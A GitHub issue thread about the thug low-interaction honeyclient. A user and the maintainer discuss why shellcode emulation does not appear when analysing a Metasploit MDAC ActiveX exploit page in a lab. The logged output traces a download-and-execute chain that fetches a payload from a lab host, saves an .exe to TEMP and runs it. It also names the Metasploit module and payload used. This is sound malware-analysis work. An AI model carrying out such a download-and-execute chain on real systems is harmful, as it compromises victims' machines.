search

buffer / thug

Python low-interaction honeyclient
GNU General Public License v2.0
987 stars 202 forks source link

thug and libem/pylibemu #99

Closed twmeares closed 10 years ago

twmeares commented 10 years ago

I've been trying to get a better grasp of thug over the past week, but I keep getting stuck making it difficult to gain a better understanding of the honeyclient. Today I've been looking into libemu and pylibemu I can get both of these to work independently but when I run thug I don't really see any shellcode emulation in the output or in the log files. There aren't many resources for thug usage beyond the explanation of the output given by python thug.py -h online, so maybe I'm just not looking in the right place.

As an example I used metasploit to host a site using the ms06_014 exploit (exploit/windows/browser/ie_createobject in metasploit) with the payload windows/shell/reverse_tcp. Thug gives the following output:

root@honeydrive:/honeydrive/thug/src# python thug.py  http://172.16.34.128:8080/saiGXyKZRH5

[2014-08-20 05:44:20] [window open redirection] about:blank -> http://172.16.34.128:8080/saiGXyKZRH5
[2014-08-20 05:44:20] [HTTP] URL: http://172.16.34.128:8080/saiGXyKZRH5 (Status: 200, Referrer: None)
[2014-08-20 05:44:20] [HTTP] URL: http://172.16.34.128:8080/saiGXyKZRH5 (Content-type: text/html, MD5: 5d68e8b50c02417a8ed51cfd72e4d680)
[2014-08-20 05:44:20] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (WScript.Shell)
[2014-08-20 05:44:20] ActiveXObject: wscript.shell
[2014-08-20 05:44:20] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (WScript.Shell)
[2014-08-20 05:44:20] ActiveXObject: wscript.shell
[2014-08-20 05:44:20] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (ADODB.Stream)
[2014-08-20 05:44:20] ActiveXObject: adodb.stream
[2014-08-20 05:44:20] [WScript.Shell ActiveX] Environment("Process")
[2014-08-20 05:44:20] [WScript.Shell ActiveX] Getting Environment Item: TEMP
[2014-08-20 05:44:20] ActiveXObject: microsoft.xmlhttp
[2014-08-20 05:44:20] [Microsoft XMLHTTP ActiveX] open('GET', 'http://172.16.34.128:8080/saiGXyKZRH5/payload', False)
[2014-08-20 05:44:20] [Microsoft XMLHTTP ActiveX] send
[2014-08-20 05:44:20] [Microsoft XMLHTTP ActiveX] Fetching from URL http://172.16.34.128:8080/saiGXyKZRH5/payload (method: GET)
[2014-08-20 05:44:20] [Microsoft XMLHTTP Exploit redirection] http://172.16.34.128:8080/saiGXyKZRH5 -> http://172.16.34.128:8080/saiGXyKZRH5/payload
[2014-08-20 05:44:21] [URL Classifier] URL: http://172.16.34.128:8080/saiGXyKZRH5/payload (Rule: SweetOrange 1, Classification: PDF or JAR, Exploit Kit)
[2014-08-20 05:44:21] [HTTP] URL: http://172.16.34.128:8080/saiGXyKZRH5/payload (Status: 200, Referrer: http://172.16.34.128:8080/saiGXyKZRH5)
[2014-08-20 05:44:21] [HTTP] URL: http://172.16.34.128:8080/saiGXyKZRH5/payload (Content-type: application/octet-stream, MD5: 21d5a930ee1853c81cdb730ce41913dd)
[2014-08-20 05:44:22] [Adodb.Stream ActiveX] open
[2014-08-20 05:44:22] [Adodb.Stream ActiveX] Write
[2014-08-20 05:44:22] [Adodb.Stream ActiveX] SaveToFile (TEMP\sXPrhuCmSkaaDsPBvqeovzQnhxcRXFY.exe)
[2014-08-20 05:44:22] [WScript.Shell ActiveX] Executing: TEMP\sXPrhuCmSkaaDsPBvqeovzQnhxcRXFY.exe
[2014-08-20 05:44:22] Saving log analysis at ../logs/e70a75375ef8d87767d8f64fdee21fc3/20140820054420

From the output it's clear that thug shows the vulnerability is in ActiveX and that there is a shell script being executed but I'd like to see the detailed emulation from pylibemu. However, I can't find the shell code from the analysis, which to my knowledge is needed for the emulation as it's done that way in the pylibemu readme file. Furthermore, I tried using libemu to emulate but it crashes saying cpu error error accessing 0x00000004 not mapped. This could be because I ran it with the executable given in ../applications/octet-stream.

I hope this isn't overly confusing. I'm somewhat new to the world of honeyclients and malware detection, but I've been asked to experiment with and report on thug. I have a number of other questions which I've been search the web for but like I said there isn't much detailed documentation of the usage. Thanks, Taylor

buffer commented 10 years ago

Hi Taylor, first of all I would like to suggest you to subscribe to the Thug mailing lists because these are not issues but questions about Thug and the mailing lists are a better place where to discuss these things IMHO.

BTW you chose not the best exploit considering that the MDAC exploit does not make use of any shellcode so no emulation at all in this specific case. You can easily take a look at how shellcode emulation works using one of the samples already provided.

buffer@rigel ~/thug/src $ python thug.py -l ../samples/exploits/22196.html [..] [2014-08-20 10:37:52] ActiveXObject: 77829F14-D911-40FF-A2F0-D11DB8D6D0BC [2014-08-20 10:37:52] [NCTAudioFile2 ActiveX] Overflow in SetFormatLikeSample [2014-08-20 10:37:52] [Shellcode Profile]

UINT WINAPI WinExec ( LPCSTR = 0x02eb2b80 => = "calc.exe"; UINT uCmdShow = 0; ) = 0x20; void ExitThread ( DWORD dwExitCode = 0; ) = 0x0; [..]

twmeares commented 10 years ago

I subscribed to the list. Thanks for the tip. However, your response has me someone puzzled. As I said I'm quite new to this. If the exploit doesn't use shellcode what is meant by the line [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (WScript.Shell)

buffer commented 10 years ago

That log line is the result of the ActiveX object emulation. Thug implements an ActiveX layer of its own (source code located at src/ActiveX) which is used to emulate some well-known vulnerabilities in some ActiveX objects through the vulnerability modules (source code located at src/ActiveX/modules). Some of these vulnerabilities make use of a shellcode but some others (like MDAC) do not require one because they are more logical errors than vulnerabilities.